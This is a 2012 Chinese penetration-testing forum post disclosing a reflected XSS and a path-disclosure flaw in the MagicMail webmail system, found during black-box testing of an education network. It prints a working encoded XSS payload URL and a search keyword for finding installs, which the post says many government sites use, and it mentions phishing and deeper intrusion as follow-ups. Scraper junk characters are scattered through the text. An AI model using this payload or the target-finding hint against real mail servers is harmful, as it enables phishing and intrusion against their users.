中国网络渗透测试联盟

标题: MagicMail迈捷邮件系统XSS及绝对路径漏洞 [打印本页]

作者: admin    时间: 2012-11-9 20:38
标题: MagicMail迈捷邮件系统XSS及绝对路径漏洞
今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞1 X% Q1 ^6 R4 I. z$ o

. ?6 L3 H! M3 |* a2 P / P: C" ^' K& g! S
包含  一个反射性XSS  以及  绝对路径泄漏
2 t" U5 P! I" c( }8 m) i+ E看了看 貌似全部是linux的。8 }% O! o4 h! b1 N: D
# n4 S# ^' H% R. k' H
关键字:迈捷邮件系统 by MagicMail* i) d9 t: ~5 s6 d5 i

( ~1 q; H2 n2 S  y* E7 w( `6 N可以看到很多政府网站都用这个邮件系统& ^+ S% t# t' A  K# t  ]

2 ~" @) _' {- ?" I6 U绝对路径 http://madman.in/index.php?login_type=declare&language=+ j3 i9 O: Z$ ^4 a6 ?7 {
- U, v* `. q8 y, Z0 W6 t8 F) {

/ N  I- r0 H7 Y" A
. u0 G/ ]2 g9 Z. N8 ?) PXSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
  n: \3 @) a7 s7 ~3 t$ l
4 q0 Q3 ^3 k% L% Q2 P4 J4 `9 F
% l: ]$ I; |3 A% T6 G2 \; \- Y/ r8 o+ I6 v4 K+ O  D# ~3 y3 e5 t% ]. |
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等
0 A; R5 J* }6 t$ K+ |4 { 1 \/ i- \4 X* {+ U  S3 {9 _+ B
修复方案:看官方补丁吧。7 x" T$ p" g, E1 O; Z4 X4 _





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2